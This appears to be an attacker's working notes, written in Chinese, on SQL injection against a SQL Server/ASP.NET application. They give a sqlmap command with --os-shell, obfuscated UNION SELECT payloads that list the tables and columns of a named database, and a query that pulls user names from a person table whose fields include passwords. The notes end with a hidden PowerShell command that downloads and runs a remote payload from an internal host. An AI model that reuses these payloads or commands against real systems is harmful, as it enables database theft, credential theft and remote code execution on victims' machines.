Sqlserver数据库sql注入payload

select * from a where txt1 like '%+txt1+%' and txt2 like '%+txt2+%';

select * from a where aaa like '%1' /* */ %' or c.goodsname like '%1' /* */%'

利用：
python3 sqlmap.py -r zjjx2.txt --random-agent --tamper=space2comment,between --delay=5 --dbms=mssql --os-shell

{"txt1":"1' /* */","txt2":"1","pageindex":1,"pagesize":10} {"error":{"Message":"' or c.goodsname like ' 附近有语法错误。\r\n字符串 ')' 后的引号不完整。","Type":"System.Data.SqlClient.SqlException"}}

'ASP.NET RequestValidationMode (Microsoft)'

num 1,2,3,4

str 5 用户表：UDQUserData ClientYPerson AccountSystemVersionInfo UMGFiles BDO_INFOPASS Intertask Roles
person BDO_Register dpv_corpmanager X_person sqlmapoutput


%27+UnIoN+SeLeCt+1,+2,+3,+db_name(),+5,+6,+7,+8+--

%27+UnIoN+SeLeCt+1,+2,+3,+4,+db_name(),+6,+7,+8,+9,+10,+11,+12,+13,+14,+15+--

(select @@version)

数据库名爆出
%27+UnIoN+aLl+SeLeCt+1,+2,+3,+4,+null,+6,+7,+8,+9,+10,+11,+12,+13,+db_name(),+15+--

数据表爆出
%27+UnIoN+aLl+SeLeCt+1,+2,+3,+4,+null,+6,+7,+8,+9,+10,+11,+12,+name,+db_name(),+15+FroM+zbb2b_skyy..sysobjects+WheRe+xtype+=+0x5500+--

爆出来字段

不行的
%27+UnIoN+aLl+SeLeCt+1,+2,+3,+4,+null,+6,+7,+8,+9,+10,+11,+12,+name,+db_name(),+15+FroM+zbb2b_skyy..syscolumns where id=(select id from zbb2b_skyy..sysobjects+ where+name=0x73006C005F007500730065007200)+--

可以的
%27+UnIoN+aLl+SeLeCt+1,+2,+3,+4,+null,+6,+7,+8,+9,+10,+11,+12,+13,+(sElEct tOp 1 col_name(object_id('UDQUserData'),1) fRoM sysobjects),+15+--
%27+UnIoN+aLl+SeLeCt+1,+2,+3,+4,+null,+6,+7,+8,+9,+10,+11,+12,+13,+(sElEct tOp 1 col_name(object_id('person'),9) fRoM sysobjects),+15+--


表结构

sqlmapoutput id data

person表结构 -- P_LSM ,P_NAME ,WORK_NO,PASSWORD,P_STATE,P_LEVER,LastLoginTime,spellcode,LINKCALL

查询用户表
%27+UnIoN+aLl+SeLeCt+1,+P_LSM,+3,+4,+null,+6,+7,+8,+9,+10,+11,+12,+13,+P_NAME,+15+FrOm+person+--

cs
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.8.106:8801/a'))"